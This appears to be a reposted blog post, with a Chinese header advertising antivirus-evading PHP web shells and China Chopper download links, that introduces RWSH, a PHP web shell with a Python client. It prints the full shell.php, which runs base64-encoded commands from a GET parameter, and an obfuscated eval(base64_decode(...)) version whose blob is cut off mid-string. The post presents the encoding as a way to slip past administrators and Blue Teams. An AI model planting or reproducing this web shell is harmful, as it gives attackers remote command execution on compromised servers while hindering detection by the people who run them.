介绍 RWSH – Ray’s Web SHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)

中国菜刀下载,基于原版中国菜刀优化版20160309.

下载地址:

http://download.csdn.net/detail/settoken/9457567

http://pan.baidu.com/s/1jHoJxHW

China chopper

http://pan.baidu.com/s/1eRxEYjC


RWSH (pronounced “rush” – credit to my friend Grev for the name), or Ray’s Web SHell, is a basic PHP web shell with a Python based “client” that provides a bit more interactivity as well as encoding.

During many of my engagements or exploits, I noticed that I was using a lot of PHP passthru web shells. These web shells typically lacked flair, were difficult to interact with, and were easily detectable. While these were useful to me at the time, I quickly realized that they could be improved with a few small tweaks. I wanted a web based shell that was a bit smaller, simpler, and less likely to have a backdoor than a c99 shell.

With these ideas in mind, plus the desire to add to my tool and skill sets, I set out to build a new web shell. (The GitHub link is at bottom of this post).

Some of the key features I have built into RWSH are:

  • Encoded communication
  • Pseudo-interactive shell
  • Cleaner output formatting than PHP passthru
  • Hostname and username (whoami) detection
  • (Mostly) Clean exiting
  • Obfuscated server (this is possible with most/all web shells, I just include one with it)

The actual web shell side of RWSH is just a PHP exec, only accepting and returning base64 encoded strings. While this obviously won’t get past anyone who’s actively looking for malicious traffic, it should provide at least a little more time against a lazy administrator or Blue Team. The result array inserts EOL characters into the final encoded string, so that it displays a bit more cleanly for the “client” as opposed to one long line of results.

Shell.php 代码:

<?php
	$result = array();
	$output = "";
	exec(base64_decode($_GET['cmd']), $result, $return);
	if (count($result) > 1) {
		foreach($result as $line) {
			$output = $output . $line . PHP_EOL;
		}
		$output = base64_encode($output);
		echo $output;
	}
	else
	{
		echo base64_encode($result[0]);
	}
?>

encoded.php 代码:

<?php
/*
 * Encoded using mobilefish Simple online PHP obfuscator - http://www.mobilefish.com/services/php_obfuscator/php_obfuscator.php
 * Original file = 289 characters
 * All nested functions selected
 * 3 random loops through the nested functions
 * Decoded output @ UnPHP = https://www.unphp.net/decode/cbfb8525fd5f07272c03ce58c9324ffd/
 */
eval(base64_decode('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZShiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygnRXljbEZVV2txeXlUbjFIaXBRTWpFSnAxclNJa00xY2FMM1oyblF0aklSOWdGYXhlWTNNaHBHeVZxMmdRWTFjeUxHRDByUmNuTVQ1Q3FhdXhxdmZrSUhFeW9USGlwUVdmSW1PZk1sOTVxeGZpRWFJSU12ODRvUmNZcXlJWklHRWtCSEQyRktwMkZScVRHSVNBWmF5bkV5dDRBSFdCSEdJVU0yMWJJRjlSQWFxaEFHRXhJSFMxRndXMVpLRUhyS0FSbkpTZ0dLU0tNSDFPWlJrWnBLSUFvVXkzR0pnR0dteVJGMEFQWlFBUkFJT2RaMUFuRDBJTUZ5cTBIU0kzbkhTWkxJQXlwMDlKb0lFSUdJRUVabVNsQlFXdXBUeVZBS0kycUhNWERIeTRHYUVWcnd1VkltU3ZISVcwbjJXM29KU09HelNNRTNxeEpKNVJuejRrTXp5Vm4xY0ZGR0UxRlFPV3FKNUxHSDRqcUtIa1pRRDVBVEExcktXV0pKZzZvU01qWnhreXB6dUdxUjFRRTAxS1pSa1ZGU3lrQkl5aURtV0pBUjAxRzBJSk1JQVRGemppTEtFaFptTUdMeEVCSDAxU1pSMUpyenlacUdwNEhJQVFuejV6clNBWUh5eDBJU0UzcDFNYU1UNVhFeldGQlNXMXJ2OU9vUmtsRUlBNkdTU0NJU1N5cDFSalkyazJyeFNKcngxR29KazJJR1dLWnlTaEd5U0xwUmtFQW1BRkxtSTJNd1NVcXdPaVhtdDRwUkl2TUZnNEdVeUZGUmN1bnhTSEh6a3pxeWNlR0h5blp6TUZwR3VKRG1TSnFJY0lvMDF3bzJFSElVeVdIMEU2RzJxRkRJU3duM01mR0pTRkwwTVFFeEFGSTBqMkRsOU1vU2NPSVNTWkphV1VBUk1obndTak15U3ZHemtRTEhFbVowZ3lwR3QyWnl0NElQOVhNMFM2RlIxRnBRUzJBU3FjblRjV01SeXlwMjVPRUdJNHFLRTFGMklIQlVxYU1UYjFGMUlhQWFaaUFUeVNxd01DSEt4NUZINTJueE1sbkdSNEVHT1JubUFqTUhBMkRhcWpwSVdFTElxeEJUSUlNYU1TRTBNRUhKNXVHVVJqcVI1aE1KQUtFSU1ESUdxbHJJdVJuenkxWjJ4MkhhcXpwVXVFQlVTVG5ReURJYUVickdJTEkwNGpuYUljRnhjeFoyeUlFUmtETVRrT0R3dUtvUU9DTVRJeW5JT0REeXFBcVV5Y1phcVNySkgwRnhTdU0zRG1MSXFLTXp1bEpKcWpxSHBsSXljUEhJT0VFM0F5WTI0MEhSY2ZMMVo1TDJ1Y0dKNDRBeHVnRElPQVpSMTFMYVcySVRJYnBtTjVEMEwzcnhSa0dhQVRGS01KRTNFUXFUMUNwUkVDRlJTVU1VV2RNeHFsbnpFNG95V3VBVFdURzJJR0EzRWFKSUFtSHhrZkFRcTFwejlScGFIZUQzT2VJd0VJQXhEbUp4NTVFVHk2cnhFbkh3dVFIMXVBcFRSa0RKdUdYM0VablFFRkcweUZBbUF6cGxneUdtdVlvYU4wRVN5WUFRTzZEMnljbnlXR3JHdGVIVHlaSnhBRHBLdUFGSklJTUgwbUEzTTBMS1IyWndxWHJ6dWFMS3VZb0dPNEYxVjFMemc2SDNBRU1ITU9IenBscDN4bEQyOWNNVEliSlNaMUhSSG1aUjVqWndPdklVRUZvS0FrSVNXaHBHcWZIU01lTVJnMnFLdUNCS0lPSUh4MXEydTRIUXRlcEtBNG96ODVFU3FJcTFSbUp6YmlISDVjSDJXNUZtWmpyeldPTXpwNW93TVJEekU1SFVFeHBtcVNJSXEyQkl1TEExV0NJUVdJSTJXbnBhU1NMeU1FcW1BdXAxTGVvd1Yxb0lNdkVGZ0ZGemZqSlFJYm9IYmtyVUFMR215MEh5TzRGeElnbzJNaG5SV25MSDlkb0h5SEh4NTVwSDAxSEtIMEx6VzFJMUFQR3p5bUgzY2ZIUjFlTVJrRG5tQWtEbDlDWTI1bm9tT0dJemtncktiaU1URDJIMGc1STJTUW8xY0FyR09oblF5bkx3dGxISU1kSDJrWVpLY25NSUVXSnpraUl5cXVIVGdaRlBmNEQyVzZJU1Izb3pxR0F3TGVFMGNscFVjYUpRUzZuR3UwSXprUnJSSGxZM3FJSEhjVVptWjNNbDlDR1FXSEhUMXZGeUFKWkpJY0pKOUtveHA0SndNbHB5TzFJekQwcG1FSUl6ZjVMMHBlQUhibXAxdG1ESEVZRXlOak1VTWlGM09XWDBBUUR5TU1ES3VqWDJ1TUhKOVJGU3lUR1JTeFkyTVdvUkliTTJNUUJISWJEYUVJSWFFRUJIa25BM09YRUlTekZVV0NGMFd2b1RSM24zeDFaMGc0SDBNZ29hY09GVGdkbmFNYW9KcWpMMnVlSHhTREUxeW5EMjRpREtPU29sOUFuejBrR1NMM0lUOXZKd09sSEoxa3BVSTBBdmdCWDF1SExtRUhBd1dkTGxmNUhhdWpyU0V2RUo1M3BKMDVyU0lWSlF5bEVRRWNwSjVZb3hTNUpKSG1GUmt2RWFxSUpLRWZNd1djRVRJTW9KeVBuVGM2SXpxT28ySGtBeU5tWTBFYW55SUhaU0V6WjFxSU0xU0xES2M2RUtxQkh6SWlaMnV2SlJXRUJLT2pvMXF6RHl5aU1UTWlaM09UcnpnbG9STUNxejg0SEtJa0hIZmpaeU1kcGFPRUczQUZMeEVoRVV1akV6MVFMMHlGRVRBU1gxTzZMSWNFTGFNaEdReUJaS1NuQkprMklSMWpBeGJrSDBxRkF2ZmtBejg1RkpJWm5KSVdvS04wRlIxNkQydVhJUGdCSXl1ZHBSVjVaeXViWlRBMXJ3dGpZMmN4TG1xbklVT2VwVWNHcWFxSkkyYmVvSU9RTHo1NXFSYmVHMERlTUprWEh4MXpHM3F1TDAxSm5UV1FKSGIxSVR1a0l6Y0ZGUmtNRlNjR00yeDBFMHVVQUtBUW5VRWlBR3RlclRJbnBVT1RvR3BqTGFSa00zRG1CVHllcktxZEYyV0xwS2Mxb3pWZU14UjJaM2NQSFFNSkVIOG1xeUlsWTJxZkh5V0VuSjExclV5bElLV2dGMEFGSFQ1bkJSYzJuSDFtcTNXbHBLRU9BSWNpWG15bElSdW1ud1NNSTBWMkh6eTBxS3FESUpqbXB3dVlaVXQxSTJXWklteVNEbUVTckpJRUxHTU9FeFNoTEpwbUF5Y0VYMmoySXl1ZHFVYzVNMERscHhFVkdUeTJuMFM2cDJ1Sk1UdWxCSlplbnpxS3BHcWFGMDVCcnlTZUZKeWdJUGdicVQ1YkFIY1RxVEVRSDB5RFpSTUJGSnlZRkg5RUcySWNweEEzSkprUEZHQW1MYVNYSHpxWG9JdTZIeWNZR3p4bEFtV3daSVN6SVJ1TU16STZaVGozclRBbFpSUmVaUXF2STJFREwwU1BxR1ZlQkt1Rm5ISWlvbXVNcFNjNHJQOGxBUk1jSnhENUJUeWtBS0E0RjB1RklRTGlJU3lGRktPRk1Ua2hubUVLWm1NV25GZ2RvVHllWWw5ZkhhQUFxSnVjQkdBa29JTXladmdVRkhmaW9SVjJBVHFpQUdBZ3FIQTBGS000REhTbUdJY0pJMDQ0TTJIMFpIU3lISkExRDBJRkkxeGVBUmptbjI1MUdRTUlGVVNCblFFZER5RWRBM1NkTUdTWHBSU2xYM2NLRUlBNkF4Y1ZIekhrREdJVU1UMTVEMEgyTEtBenFUNTBKSmdpQUlNZkV6QUlCSmowQkhEakZ3TTBaMWNsTTJnS24zT3dYMnUxTEZnaU1TdVlxUUEwQkpjQUhVcUtCS2MxbkpreUJJcTBadmdVcGFTRE1tU2ZBUXFpWkhrWk1ReTFGM3lnRngxYm54cGpBU0lqRnpJd0JTUzRCSHF2cXg0a1owRDFBSVczSklNMlpUQVpxUmMwSWFBUEV6Y0xKYU82RXlxUHF5UmxHeldVbnpaM1gxcURNM1NlSUtjT0JJRG1FeGt5TElWaUZRT2VwR04zQTNONUV5U1hGMk1iR3hrRkkwcVlKVGdPREl1dUxteVFxSFZtTG1PUVozRXVwU3FpSktJU0Z6dVRxS0RpTDF4MXFUY0VIUjRtcGFTMEhLeW5aMXBqQTJTYkVGZ0JySUFZWm1PUEF6a0lBbU4xSEpqbURJeWpueGJrTUZnU0lSeXdveFNTRVVPem4zdVNGYU1BbjBNakRINUduYXFEWDNBeEdhYzFaM2MxckhBaE14a1Fud0lYRjB1QkhHdWNNYXliSEt1RkVhTDFvYU1ETXh5YnFUdUxJVGNYTEdWa0dIOTFyYVprcXl5NUdIY01HS3lZbzN5Nm5tUjBIU3V2Wnh5RFoyNXdud3lQR3hFWkJGOVlyejVqQlI5eUdJT2tGR1NVSndxR0ZSZ1JySmNiRDFabEZ4TXdHU09tbktxSE15RUFueVNpbjFBSXJSeXZNUUVmblFPWEJTQWpNeGs1b0pWMXFIeUpBSGtpcEtxdkRteW5FSVZsREhjWXFtTVBBYUFMRklFbUVHTDVIVFdBRjNBbERLU2RGVDF2WnpaaUZRT1ZabU9ocDFNWEQxSUVxeU8yWjFXNG5VSUNyVDFRWlFTWW5SeWlFS0F2ckdWMUx4Y0JIMWMzQXpxSkZIcUZCUlNtRUp5Z01Sa25uMDl5bmF4NEdTQW5NUnlXWDNWZUp4Zm1ISWNVSnhjNHBIRXVxUVd2RTNNZEl4RUdFVWNPcktJbnJLT3hEMGd1RzAxY0ZJeVFFR1NBckpxZHJScXlFSDVQRVRIMUpLQUZBVUlETTJ0NEhUU0NJSUlVTHg0MW5QOWRwMnBqQVFXRFgwV0xvenFSSFR1T0FJSTFEeU1rcFQ0a29SMWNBUmNVckd4aXFKOUJHR0FhQVVJTFgwQVlFS3VrcUlWa1kwTW5NbUF5RWF1RUhSMDBwUjl5TUh1NEdVSWVuVUlsRm1JT25Ia21NM3EybjJTMG4ycDNaM3AyRlFBVE1tTmxIM00yTElJMloxQWVGS2NpWmFFWFp5dWtHejlPcDBJV3FVWm1KVUV3b1JSM0JSV2FFeE1nb1Q5Q00wU0lGbXkxQTFxaUR4dUZJMnF4TEtNQ1kzSWFCVHF2cFV5d0p2OW5FVGtoWlJ1RkVTdVREMklUTXlxY0dKYzZJbUVQcEY5d0FIcWhaU1N3RHhTZ0p3U2lueXlRQkY5NEZ6YmVNeEl5cmFNT3F4STJER09WRTBrMm5IZmVxVHFDb3lIaUl6TVBKYVNqSnpFNUV5TTNvM01aQkd1SU1hV1lGMU9IRWFPR3JSMUNIeFd6SklNM0l3QUlCSFJlQVRjY01URWZKU3lZblN0M0FTYmpwUjVDWjNFd0JVeWluS3FTRmFXZnJLdWJaSk1oRXpEa0cyeUVJSDEyRUpxaW56Z2hBSkF3cUpJMVpTRWRuUXhsRnlObUVLQUJISlNITUoxUEwyNWJFMDVPRDNPVUh4dTFxSkEwWktia0RHeGlvYXU2blI5eUUwOVpuUk1UcHowZUp5Y0NuSUlDbm1xT0lLcXVxenFRWW1EZUxIcW5IeXBrbkt1U0F6RTJNM0FiWDJJbW9tSTBFS1N5cVA5WUhtTzJFUnllREpmMm5VTmVBM3VLcHY5dm56RVdHSU02SkpJaFp6Y2dZMVNpR0ljelkwdDFIS3VVblJXbER4QTBMM3VCTUdXSUV3T1VKUlNDSnlJSUVHeVpxUU81QUtjWkxINVBEMUVRTVJ1aFpLcVZCVFd3SXhTd3JLV0JxS2NsWTB0a0lGODRMelNqTWw5REd4eUxabDlFSUhqNEhQZ2RIUmtCRElMbEExTUZYMnliblJnUEx3U0NFVXF2bndJekp5TVBHS1NCcG1wZUcyTGVHU1JqQktManBKcG1aUmMyRG1wNEpIV2lySXF2QVJTTXJ4QUpIR0F2QktPMkhtRWZHUUlMTEd4NEFVWjRYbU9iR3o1ZUZ4NWFCVHVNWjFXQ294ZjFySFdpRVR5Zm5TQUpHd3FaTTBSMk1tcGpKVVNrcUtJV295Y3dGeldKSlJxdkJUNDFvVFducDF5SEltUjFySkwwWTBnRkVHSWlwSFdoWnlSMVp6TW5IbUVZSlRnYnJhU25JU09iR3hNWXF4TTVMeU1NcnhFV0ltRGpHbU9FSktFVkVHcWVyS3k1clRBd0dTSWVvR1d2cFBnQ1ozV1ZaSVdDR1VFWW4ySVRNbVdsRjJ1R252OTBaYU9ZcDNBVkdJdWVvUUQzTXhXQ3BSQWNIMjVrRG1NTEFUMVNMd0FYRVIwaUVLY1dYMkgyb3Y4aW4zcUZaSUVDb21BNG9IeVlGR09HTXl1RUR6cXhwenlNTEtNMG5SVjVxeHRsTEg0MkZQZzNJR1N5cUhrZExIa0FCS09WTTBjSVpKMWFEbXlpQW1XT1pHdXVyUDliRDNSZUF5QVJHeGdVSlN1d0V3U3lFU1NYTXlTVUxIcXhHMXRqTTNxZE14a1dwU2NIRlFBZkZLdUpwemdLR1VJYkhhY2RKeU8wcUY4bXAxT25vMXhlTUlTSUdUeVVKUjVkRUhXZ1p3cW1xVUQ0cTFTREdLRWFEYXRtQTBjMUx5V1ZyeDVQcTFiMUF4Vm1JU0lER3lNeE1Ia0NKd3V1QXhjSEUxeWRaVWNYRHlOMkxsZ2FESjVTTElXR3F3V3ZaMGtWRnhNMkd3eXpaejVJcXhBV3ExTUZBbVNsTUtXYUhteUJJeHVTbklBM29JcUlyek1VRElxYUlhSDBGU3VtcDJMMkJLTjVwSXAzRjFIaU1RWmlBMkVLWktJa0RtdGVMM3l6blFJZVgzU2xHMjVmQUhXU0JLcDFHVEFWRElxTUp6QTFCVFdIQUtNTERLSUNxSkV6cEgwM0hRQW5ad3lpb0g1Q25KeUpuR01NWjJ5UkFUa25aM01BcVFXSUVHeWRxYUlHSnd4M0VJeUhGejFRTTFBMUVSa0FwSmI0QUhTSEFLcG1aYXExSW1XR3JhY2JNbUVjRTF5ZEkxeTVKUnVkclRnU25SYzNwYVY1SUhwM0dJQUlKeDlERUlFU1kzVzZvME1Xcnh1SkcwSXdMdjk1THdOZXFLYzFNUjlTSlNjQkEyRWFYMmMyTUpNM0pHSDBESnVQRTNSMW9LU2tMeU1QcWF1bUh4NVZFUGdTSHlabW8zRDRFVHVCbmw4MkczcW1Id05rTTFXWFpTdXlaS3V4SW1JaUpVcUpIeElCSTJjdUEwZm1wUkg1RDFjUkd6RVZBUXFnRUdXaUlteDVHSElXQVJnUW4xTm1FS09VRXpTQkhLeXVNVE1Rb0tTaEpIU0FBS0Qzb1BnaUUwU2hESE15b0lMNW9Ua1JJdmdTR1VPakh6MVVIMGdsTUdBNkx4UmlwVXVSRktPRkdRRWVFUmNVWnlXZ28xdU9xUVMwcXlJWXEyRUpaMVYySTI1RXBVTURvSDlCR3pJVUdKRG1vSXFMSDJBT0pJcGlJUjRsRjFJRG9LVzRJbGdrSlN1eUx5QUluUnFJREd1RVkwdDFMMlYxSTJTUm8zU2VYME13R1J5WUFLTzJIR3AzRklPUXB4QUtIM09pRVQ1eHJHQU9yVWNQSDNXMloyRWZwSnVCQVJIaUJUcVdBSHgzR3dPNkd6U2JIMk1iSDFEZW9IWmpwMHQ1cktJQ29INVBJMXQ0cTNxbkFUMTZwU1N4QUdPZHJKRWhBM0U1cVJxeG9hRGpwRmdZSElFZUVKSDRaS0FjTTNPSXF5VmpESHVFb0tBZkhSeW5yR05sWG1NSEVLU3lFeUFIQXpJZ3J3U0tGUnVYWTBmM0kzTVpCR0ljSkp5Yk1LU0FEMU1jWkp1bHFIY1hMSUlab3dXaVoxRDJIM0xqSlVaMW9HT09HSFNqQUt1bXAxSWtwMEFuSGFEZUpUY3VKSEVnQlJBZkYySVBGMnFkblFWbUZTU0FBVXV3R0paMUdHSDNKd1Y0THhJTEVKZ2lGR3lFbzFjT0cwYjRyVDF2SlNXd3EwYm1Ed3lTQlNPaExGOVpESFduRktabG93V1FNSkRrWTFEMXF4Y2FNM1dYR3dxeEkyQTRHd1MwSGFJNHJTQU9IUnFMcHd0bEx5STRZMVNQRnlJbG96V0JweklnRjJSa01HSDJNSGtDcDNFaXJIcWlBeDBsSkprUEVQZ1dEeDVIRTJ1Z3AxQWJuUVcyWndNV01KUjJyUXAxSVN4MUdGZ1RuSUlHblJJRFpJTTZES0w0SUhMMklKdVRBUXVKSHljaEFKZm1xeXk2TEd1dUgyNW5EYUQwckdxWHFSa09HS0VnSG1PSUZVeDNyeDFZRGFxMm9USDNJSmNBcktXbHFLRUpIeDVDbnlPWEpHcU9wMU8zRHljQ0ZTdUNKdmZqQUtJVXFVcTRBenU1RnljZlgzdWNaSkk2TVI4NE1tVjByUnVlR3pFbEpKRW1uSlN6WDFjRkV3T09vekllb0lXbEYycWRxUURpTUd0NEZ6a0lueDVnRlRFY0Z6Y1dFMkFrblJFSUwwNGpYM3U0QVRXbkJSY2xuUldiSXZnNHJ4NTRwM3U2RlVXMW54UzVEMjV1SlVwNEh3eW5ZbVYyWDB1MUhTSWVKU1N5RDA1aU13cDRuVFJsRlJIMloyRWVwbVpsclF5S0ZVRVJHVFNZTXpBVkV3VmlxUU5rWnhFY0YydXZGM0Vhb0pTbW5JcWhHSHlnWDF5VHB4RW5NekVScEtjREJVTWVuSFdQTEdabEdKa3hBSFMxTVRxQnBTdVpaYUlmbzF5NEZ5dDFZMGdrQUdXRUhITVBwbXFrSXlwbExKYjVJYUUxQWFTeHAzcUdYM2N4R3hxa0UySVNyVHFXSHpmNEZKeGlNeUhtRHpEbXJRSGtFVDVISkdBREhSMDBHMXlMblJJRUx6Y2pxelMyb3Y5V28xRVZaVUloSVRjSkdJUjBIYU9qSHdNenJUcVNBd1dQQTBBdUR6ZjRvS016TUdFd0VUeDRxbDlBR0o4a0l6OGVNSXRpRHlBNW4wSURCVHluRTI5eG95dXpBd09XWG1BWkUyRW5GUUkzcDFFaHJVTWZaRjlIRlA5UElHT09wVElsSDBTUUR4cUlGM3Q1cndMNU0wSVZFMmtUSXhrYVp6Y2dvRjhtTGF5UHJJTDBHM0xtRkpBR1p4NGpxenl2REt5VHBINW5aVDF3TXdxZ1pKa0xHMUhrSG1BbUcycDBNS0k1cmFTR28wOUpxMkFVbkd1aW95TzVBVGczRDBxSnBJTXhJeEVpQTFEMUUxV1dHemMzRkh1U3AxQVpCS0lkcHZnVEhhUzZaR01EWjJTUFphQWxxS0FpTDNjWW8wa0lwdmduWkpJd0p4Z2lJUUFmTDBaalhtV0JNeHAzSHhNSUlSRTRaVGNGSUgxSUJURWVuYUkyQlI1Q0d3VzZNMXkxRXZnbnB4RWJvVVc2QW1MMkkwMXpMeVNIRVVaanF4a0lNSEVQWko5MXBLU1ZvSHVMQkhJUG8yQVlEd1JqRnpnTXFRUmlyelpsblVBUEZJdWlaMU9hbjB1TUZ4eTNGR0VEWkgxanAzdXdySnVYSlA5d0wwazVJeEFlTVN0MW96V0dySGtkRXpaa3F6QURNeXFScko5QXBUa2dFd00zb1V1aEwwMDNvUjk1cHd5WnJSZ0VHU09MWnpBRVlsOUNvVXFkclJxeEZ5QWJIeU1hRm14NG9KOVlBUU1sWnlFYkhRT1VxR01CRUhBWlp5T2ZaSFdJRTJJZ0RteTJEekk2R0lNYkpVeGVyeUhrR2F5Nm96OUZxYUFub0lNVUlQZ1BKUldZWjF5ak1INWFFbU4zblRTWUZJU3luSFNNckp1R0JHTTZuM3QyQWFNMERIa2lyU09ISG1XeHExRVZBMFdKWjNEMEQySXdZbU9jcFR5Yk1heUZHUjlITXhrWExIV1VFU1pqb0hJV1kxY2RxVDV4TEh5VFpKeUdvSlIxTDFPaExKTDNESVNUbmFxbkZSMWRwVFMxTWFxWUdReVZJSnVjcXhXREUwQVZvVHF5WkdPNUJIYjBFR3Vob3hrYkVSZ2pxeHVnSkpTTEwwUjBJUGdHQVJ5dm5TSGxHMUlHbktPSklhVzBFd1ZtSlRBZW93TVFyd09mSDBnbUp4Z2ZxUnQ1RDFxVlpKQXdBVDFaR1F1U00wcVpHMUV5Skg1em9LWmtCVU92b0txSkZKY3daSUkyWTNTYkRHcVlvYXlGTDN5M0QyNTVId0lVQXhBWFgzSUVyeE11cVFJSER4OURBM0FkQUdMbW9LSWRGUU9ISkdPZnJLcWpaUmdIclFFNUZKSW1IVUluRUZnTUZ5SVNBME1iRVRBYnJ4NUFHR08wWm1TYkJKcVdBVVdCQW1xZ0pLQUJESElURkpxVUh5dWFER3FsTEhXM0h3V1ZxMkxtclF0a256NWRZMkVHb0lTS0pVTDFySFc0QUhrbkYxcWhGMGtkbzN1Y1kweXdIS1IzTVNJdkh6Y0NNUmdVSUl1WkRHT0ZvVUVFREdTZHB4TDFKSjl2TVFOZUczTVZBRmdjWjNjNW5hSURJMHVhWjBTZ25hT3ZMS3lEcXhMMUl5SUFJSUlNTVRXekVtcUJvSk1Lbnp1U3BVQVlGYUV6bko1ZEh3eVZMenltcXgxd01hSUJGUUhrbnlFNEkxV1dwU1JqSUpXM3AwRUpNemczRlVOaUVIRWFxbU9VbjNTaE1SeDNySnVMQVJTbEYydWRHYUlWRDN4ZW9TdWVBeUUwSkY5em9IYjFEejFQcEhWMUVINWhGenlLcnhNQ3FhU25MeklTWlJBNEVUa1lweFJqcktPZ0dTQXlFbVIzSXdJQ0pVdGpKemYwWkpnUHJIZ2xyeHl5SFNxa0JSQVJaekVqbnZnUm94U0VKS1d5cnd1T3EwY3pFMVplQlVMNEJUY1JxenA1WnZnMUV3TmxHMFNsb3pnWkR6RVhaMjRpTXl1anJTQUZIelNZWGw5UklTY0ZJeUgwR3hFMnFLV2xFUlN6SXpnZkRsOXZBS0FQbjJXeUVJQWdxelN3Wkg4MFpIdXVxVE15bnp4a3F6dUNBYWIwcEd5YkJRdU1IYXlEb0dEaUR3SWxaYXkwTEhNTEgxYjJvRjhrbjBXQlpLcU1IMmdjb0hBaW5UY0VBekxtSW1PY0VVcVpKejFKSWxnZEhUdU9FeFdsTHZmM0FSeVFIMjFBRXoxMnEwMWpwR3RtR0tNZURGZzREekVjSDIxZkFINUhyVHFMR1RNSUkySWZvUkVnRnpXMlp5dDVuSHE0RzFaNUQzU1dES1JrREhiNXFhcWdCVXBlRTN5VW4yUjNGeEVNSVF5V3BLTUFMMnFkQUd5S0R6dWhBYUVHWlJnblpKTVlMSkFSSkpxQVp6NDVBSFIyR0d0MG9RWjNuR1N1RkpTTEZUY2FGSDFQSDFPa24xSTVEM3V4QTNwMEV5dVNFMjlBb1NNVElKZ25MeGNTRTNNbEdHdUdGMlNHRVVPWkFheVdHVXQzQTA1Rm9JSGtwbDlWR0hnNW9VcUpKSjUycHlJRHB6OG1NVWJrRlNiNUYyUjVNeWN5WnhJa0d3eWFxUUFoSkdIbEV4RU9GUmdqTEtiNXJKMUdJeEhtTVRBaUVUTDJBVHlGbzN5bkd6Z1Zyd0QzSDJxdXEySDVNS1drRlJ5d0EyTTNGMjkwbjI5Y0cyV3dESjk0bjBMbVkyRTVxVUVuSEtxbUVVT2JwSXkzWTJjUm5KRGpISFo1R0lxZ0JUTUxGSGNmcDFxUk1TSTRyUjFacDI4a1pVV0VKSVNhcHp5TXBKV0pueFdTcklXMUZVYmVHMklNRm1BUW5UU0laSmNYRXdNMERhRGtIM2NTbjFFNXAyNGlvR3hpb3d1SHBJQWhMeHF1cVR0a1p3V2FBMXQ0RnhIM0FhU1JFbXVabkljQUFVQWFyUU9tSEpINEYxV3ZESXQyREpJRkJHRWRGYUlJWlRnZFltdDFxUXFCWktTbXBJQWVxeGNGcTJNTUZLcGxESU9hQVVxWm5KQXluSlNHcFBnNlpLRWVuUVYxSkhNS0JTdG1ZbUVZb3dTSkJTWmVCVDllTTJiMnJGZ0dBVHU1RlBnaW5TcUhaejltR2F5Q1gyamVwMGNtTUoxUnB6dWlxSVNjRHdNUU14MG1xeE1TRlRBbk1RSDBIM09pQVFXWE12OVhwSDFtblRrZU0ydUxGSEVNb0h5V0l4OXdBVHF4QlJFMEJHTjREd1c2TVRxY1oyMDVJeXlqSFNIa01RU2NxVFplR215M0h5QUVFVHFFQWFEakFKNUVGMDFqRjB5ZUJJcDBZM1N2SlREMnBRcVpYM3FMSVQ1T0ltRUVwemdqQUhjd0FtSTVwUU9VREljMXBRT25MekVBbklFMm9tT21CVEVmQkdIMEVRTzRHMmY1TDFxaklIcTZvemNjcXpxeExIMUpxemdURjBxME14cDFwMEVjRzJTekJLUzBKeXlCcTB5WUx4Y1FHd0VCcTN5Y3AzYjNHUjlWWjFPSEFhdXVHd01IR3gxVkRhQWlEeDVBclJnem96eWlNSGIyR0ZnNUFKQVRFVXFkQlJnVkZSY3dGeUlucTFWMURsOWFKVDk2RlI1VE1JeVRCU2NaWkpjRkp4VmxxR0gySlFPbUkyNUxEd3Q0QXp4bG8zSWRGeElRRzJWbUhKV0ZJYU91RDJrM3BJRUtaSGNoQTJNZkxLUzNwVEQ1R3l1WXF4RUtabUFIb1FJQm8yeUxKR0lCSVI1d0R3SUtyVU9icTBBSlp2Z2ZveGppRTNFTVgzU1BNUnl4cXhiNEZ6NDJuMkgzSFFTVG5IcVdIMUFMRHpwM3FKTUNvVGoxb0lSa0dHQW1HU09CQTF5SUVSNWVJUjQxTTBJVEEzSDNMYXVWcWxnZUlJeVhHUUFURnprQ0FtQXdEeFMzcXhBSUp3QUJJR1ZpRjNxMEJTRGtEMHVFcGxmMEdRTmpGYXkyWjFBeVgwWmxxYU1nTHhrV0hVQVJJeGtPR3lJWEcyeVJIM3htSXgxNlkxU0pyeHBlRGxmakxhcDJBeE1lWW1BQkh3SXpEM3FGRnh4a01JTjJBeFZpSlF5TEkxV21NR01RSDNBMHBRdDBvMGtHb3lPMkx6TGtHbXhpR3lBbEp3T0RvR0VYRlNwNG5LY0hESXF6RzJnRUcyQVJBVDFpR1JTT1kxTVJyRmdEWkpqMnBRTTZwM0ExRVJTTEZ6MTVFSlIzSVJaMkdJQVpHVWNFRHZnWFpVTTZHejk1cG1XWUUwQVlweEVBTXl0ZXBScUxHeUFIb1QxYUV5cGpKenlJSVFFQVowU0duR0ljQUpmakFUWjRNSFJrTHdSMEF6TU9GeFdYRlQxdUJVcWZBek1ScDFXMm8wY2JxU0FpQlR5RExKa0VKemtmRzBrQ3FTdWpvVHg1THd5Q0V6Z2FuSmNDSFJneURLTmpuMDVuRW1BR0x5RWVBd3VrblN5eG56TVBxMnVVckY5S3B5RTBEbUFibktxQ3BJSUJvYUVpSkpJV0Z4MTZJYVNiSnl5enF6WjJaeFMwRjBJZW5TRVBJSGtMQTF5Q01HRURJMDVWR21NNFoxTXVHUVczRzAxRVgxeUNBSGNQcTJFUEdGOVhJeHlVcktXQUcya3lvd0RsRTB1REh6RDNxenBsSGFBNlpHTUhxM01LSVFXdnBLTWhud1dIRjFBYVkyZjVxUUUySDIxekp5RUNNVWIxR3o1NXF5SWxGS09jRUpNZG4xTWxvUlpqR0ZneU0ycWxHekUxSEo1TW9JRUtHbGdaWjNJaE0zdWRuVElPSVF1UkVLY1NGejlFTVJXeXExcVlIejF2RzF5WkR3T3pvS0Q1bnpXY3J6U3VxVDlIckdaMW5SNWNMMDlQbnhTWkxtSUtuSDEzREgxQUczdVVvbXlETEhrREZhVzFuR3hlWDBwM29Sa0pKUUVDcXp4a0kwVjVCUUVTcUdJU1p6RGxIUmNTSG1MM1kwZ2ZNU2JscVVJREgwYmxxMk1nTHlPeUd4YzFBenlHSDJXSkltWmlGMnlERlVTZ0V5eWNHVEg1b0pqMU16eWZJS0liREpjU3AyU1NZMXl3b3o1WlpRdUFCSmJsSUtNSEh4U2tISXQxREtPS0QzT0ZIUlIxRXpFZ0F6dW5FVU0xb1JWMUhIQXVvUXV6blBnS3F4NWhvSk1pRklWMUYya2lMR0FVRDFibERJQVNwd00zSEdNVUxLY0pNRjl6bjI0bG94eUFGUDhsRjF5ZkF6STVYMnlkSVJjS25VcUFuMEVHTXpTQXBTV2NKSDV5RDFBQ0FVRUFuMGZtWjFEa0wxY1pKSDAyb0hrSHFISVFwSE1PRm11NkZUZ2paMD